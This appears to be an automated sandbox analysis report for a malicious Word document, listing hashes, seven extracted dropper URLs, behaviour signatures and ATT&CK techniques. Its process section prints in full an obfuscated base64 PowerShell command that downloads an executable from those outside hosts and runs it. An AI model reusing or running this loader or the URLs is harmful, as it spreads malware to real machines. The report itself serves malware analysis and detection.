Analysis

  • max time kernel
    131s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-05-2022 05:24

General

  • Target

    fddwfhwu.doc

  • Size

    178KB

  • MD5

    8edc3c8487342e650a803d995eda3aee

  • SHA1

    eed3e8ce919a1ed602997d1a1137f8d19a554b25

  • SHA256

    d264878eae29d3da022f38e67a38560346ba42cbb6dbebbf0e6c852c666fb1ac

  • SHA512

    1b7500d183db31f3f5eefd80a62a9eaf36aff9024c7c2b37f5e8525b3633db4bab7441ea2e7914cec269bf6a9d403b55273295f6953fda53ab1906c2d986d272

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.hhbiao.com/ro/hEGGg/

exe.dropper

https://kissanime24.com/anime/tnqblnm875789/

exe.dropper

http://ahansatan.com/wp-admin/IPTpsJjvkKHDM/

exe.dropper

http://goldoni.co.uk/bmnfg411/qQmxCDIzDcR/

exe.dropper

http://hirken.com.au/images/kul5uy3a48/

exe.dropper

http://hofhuistechniek.nl/localhost/ZDN9mtkv7hsl25097064/

exe.dropper

http://itcnt.com.np/2xk_kxs_r3u3g4/u2ka4qa5362685/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fddwfhwu.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2824
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABMAF8AdgB1ADcAMgA0AD0AKAAnAEoAXwAnACsAJwAzADYAJwArACcANgAxAG4AJwApADsAJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBQAFwAbwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBDAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAVQBgAFIAaQBUAHkAcABgAFIAbwB0AGAAbwBDAG8ATAAiACAAPQAgACgAJwB0AGwAcwAnACsAJwAxADIALAAgAHQAJwArACcAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABKADMAZgA4ADMAbgBsACAAPQAgACgAJwBOACcAKwAnAHQAJwArACcANgB1AHcAZgB2ACcAKQA7ACQATAAwAHMAMgBuAF8AeAA9ACgAJwBCAG0AYgBkAHUAXwAnACsAJwBiACcAKQA7ACQARgB2ADgAaAA5ADIAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcATgBkAHQATwBmAGYAaQAnACsAJwBjAGUAMgAwADEAOQBOACcAKwAnAGQAdAAnACkALgAiAFIARQBQAGAATABhAGMARQAiACgAKABbAGMAaABhAFIAXQA3ADgAKwBbAGMAaABhAFIAXQAxADAAMAArAFsAYwBoAGEAUgBdADEAMQA2ACkALABbAFMAdAByAGkATgBnAF0AWwBjAGgAYQBSAF0AOQAyACkAKQArACQASgAzAGYAOAAzAG4AbAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAVQB5ADUAMABfAHoAdQA9ACgAJwBLADEAbwAnACsAJwBpAHMAMgB2ACcAKQA7ACQAUABiAHIAYgBlAHQAbgA9AC4AKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAYgBDAEwAaQBlAE4AVAA7ACQASABfAG8ANwBzAHQAOAA9ACgAJwBoACcAKwAnAHQAdABwAHMAOgAnACsAJwAvAC8AdwB3ACcAKwAnAHcALgAnACsAJwBoACcAKwAnAGgAJwArACcAYgBpAGEAbwAuACcAKwAnAGMAbwBtACcAKwAnAC8AcgBvAC8AJwArACcAaABFAEcARwBnAC8AJwArACcAKgBoACcAKwAnAHQAdABwAHMAOgAvAC8AawBpAHMAcwBhAG4AaQBtAGUAJwArACcAMgA0AC4AYwBvAG0ALwBhAG4AaQBtAGUALwB0AG4AcQBiAGwAJwArACcAbgBtADgAJwArACcANwA1ADcAOAAnACsAJwA5AC8AKgBoACcAKwAnAHQAdABwADoALwAvAGEAaABhAG4AcwAnACsAJwBhAHQAYQBuAC4AYwBvACcAKwAnAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBJAFAAJwArACcAVAAnACsAJwBwAHMASgBqACcAKwAnAHYAawAnACsAJwBLACcAKwAnAEgARABNAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGcAbwBsAGQAbwBuAGkALgBjAG8ALgB1AGsALwBiAG0AbgBmAGcANAAxADEALwBxAFEAbQB4ACcAKwAnAEMARABJAHoARABjAFIALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvACcAKwAnAC8AaABpAHIAawBlAG4ALgBjAG8AbQAuAGEAdQAvAGkAbQAnACsAJwBhACcAKwAnAGcAZQBzAC8AawB1AGwANQB1AHkAJwArACcAMwBhACcAKwAnADQAOAAvACoAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwBoACcAKwAnAG8AZgBoAHUAaQBzAHQAJwArACcAZQAnACsAJwBjAGgAJwArACcAbgBpAGUAawAuAG4AbAAvAGwAJwArACcAbwBjAGEAbAAnACsAJwBoAG8AcwB0AC8AWgBEAE4AJwArACcAOQBtACcAKwAnAHQAawAnACsAJwB2ADcAaABzACcAKwAnAGwAMgA1ADAAJwArACcAOQA3ACcAKwAnADAANgA0AC8AKgBoACcAKwAnAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGkAdABjACcAKwAnAG4AdAAuACcAKwAnAGMAbwBtAC4AbgBwAC8AMgB4AGsAJwArACcAXwBrACcAKwAnAHgAcwBfAHIAJwArACcAMwB1ADMAZwA0AC8AdQAyAGsAYQA0AHEAJwArACcAYQA1ACcAKwAnADMAJwArACcANgAyACcAKwAnADYAOAAnACsAJwA1AC8AJwApAC4AIgBTAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAYQBlADgAaQBjADcAPQAoACcASQBtADQAcwAnACsAJwB5AGsAOAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAG8AdQByAGMAZQB0ACAAaQBuACAAJABIAF8AbwA3AHMAdAA4ACkAewB0AHIAeQB7ACQAUABiAHIAYgBlAHQAbgAuACIARABvAFcATgBgAGwATwBhAEQAYABGAEkAbABlACIAKAAkAFUAbwB1AHIAYwBlAHQALAAgACQARgB2ADgAaAA5ADIAdAApADsAJABNAG4AMwAwAGwAeAB2AD0AKAAnAEsANgBtAHkAdwAnACsAJwBvACcAKwAnADkAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEYAdgA4AGgAOQAyAHQAKQAuACIAbABFAE4AYABHAHQASAAiACAALQBnAGUAIAAyADYAMwA0ADgAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQARgB2ADgAaAA5ADIAdAApADsAJABUAHoAdAA2AGUAaQB6AD0AKAAnAEwAeAAnACsAJwB5ADgAYgAnACsAJwBhAGQAJwApADsAYgByAGUAYQBrADsAJABXADIAZgBfAHgAMAAzAD0AKAAnAEoAcwAnACsAJwBvADIAaQA0ADkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNADIAOAB3AG8AegBuAD0AKAAnAEMAJwArACcAZwA3ACcAKwAnAGEAOQA3AG4AJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2000

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2000-148-0x000001A7D5A50000-0x000001A7D5A72000-memory.dmp
    Filesize

    136KB

  • memory/2000-149-0x00007FFDC0490000-0x00007FFDC0F51000-memory.dmp
    Filesize

    10.8MB

  • memory/2824-136-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmp
    Filesize

    64KB

  • memory/2824-134-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-143-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-135-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmp
    Filesize

    64KB

  • memory/2824-130-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-137-0x00000187DB310000-0x00000187DB314000-memory.dmp
    Filesize

    16KB

  • memory/2824-138-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-140-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-144-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-142-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-154-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-133-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-141-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-145-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-146-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-147-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB

  • memory/2824-131-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-132-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-151-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-152-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-153-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
    Filesize

    64KB

  • memory/2824-139-0x00000187C6BFC000-0x00000187C6C7D000-memory.dmp
    Filesize

    516KB